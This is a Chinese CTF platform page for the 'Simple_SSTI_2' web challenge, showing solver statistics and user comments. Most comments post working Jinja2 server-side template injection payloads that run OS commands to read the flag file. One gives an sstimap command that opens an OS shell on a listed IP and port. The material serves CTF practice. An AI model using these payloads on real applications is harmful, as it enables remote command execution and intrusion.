Simple_SSTI_2WEB 未解决

分数: 10 金币: 3
题目作者: valecalida
一  血: Tokeii
一血奖励: 3金币
解  决: 16562
提  示:
描  述:
Simple_SSTI_2
评论
suxiansheng 1月前

详解参考https://mp.csdn.net/mp_blog/creation/editor/161513397

回复 0

pipizhu 1月前

?flag={{lipsum.__globals__['os'].popen('cat /app/flag').read()}}获取flag

回复 0

bugku2026 3月前

先通过?flag={{self.__dict__}}发现拥有lipsum,再通过?flag={{lipsum.__globals__.os.popen("cat /app/flag").read()}}获取flag

回复 1

r1ng_13 3月前

焚靖直接秒,比上一个SSTI还简单

回复 1

网恋秀牛子被录屏导致自卑 6月前

/?flag={{(OvO.__eq__.__globals__.sys.modules.os.popen('cat flag')).read()}}

回复 1

liutong27 10月前

python3 sstimap.py -u http://117.72.52.127:12369/?flag=1 --os-shell

回复 1

wywitkey 1年前

前面说的都对,这道题在ssti里比较简单,推荐使用sstimap,可以一把梭,直接出os-shell

回复 0

HK1ng 1年前

详解:https://blog.csdn.net/m0_59527104/article/details/147013776

回复 4

smtall 1年前

flag={{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat flag').read() }}

回复 0

hao7 1年前

?flag={%for(x)in().__class__.__base__.__subclasses__()%}{%if'war'in(x).__name__ %}{{x()._module.__builtins__['__import__']('os').popen('cat flag').read()}}{%endif%}{%endfor%}

回复 1

WriteUp

image
valecalida

5 金币

评分(15)

解题动态

Sylvia 攻破了该题 11小时前
windliu 攻破了该题 2天前
一介村妇 攻破了该题 2天前
Kur0Ai1uro. 攻破了该题 2天前
luobosir 攻破了该题 4天前
MOTMlsc 攻破了该题 4天前
暗流安全 攻破了该题 5天前
dwx386572657 攻破了该题 5天前
15079182261 攻破了该题 6天前
zxx256xxz 攻破了该题 7天前
yxrw 攻破了该题 9天前
天天1 攻破了该题 10天前
Aa313010 攻破了该题 11天前
lvchijing 攻破了该题 13天前
KING12366 攻破了该题 16天前
星落. 攻破了该题 16天前
Dlacking 攻破了该题 17天前
薄言. 攻破了该题 21天前
Zfc 攻破了该题 21天前
周文君 攻破了该题 22天前
问题反馈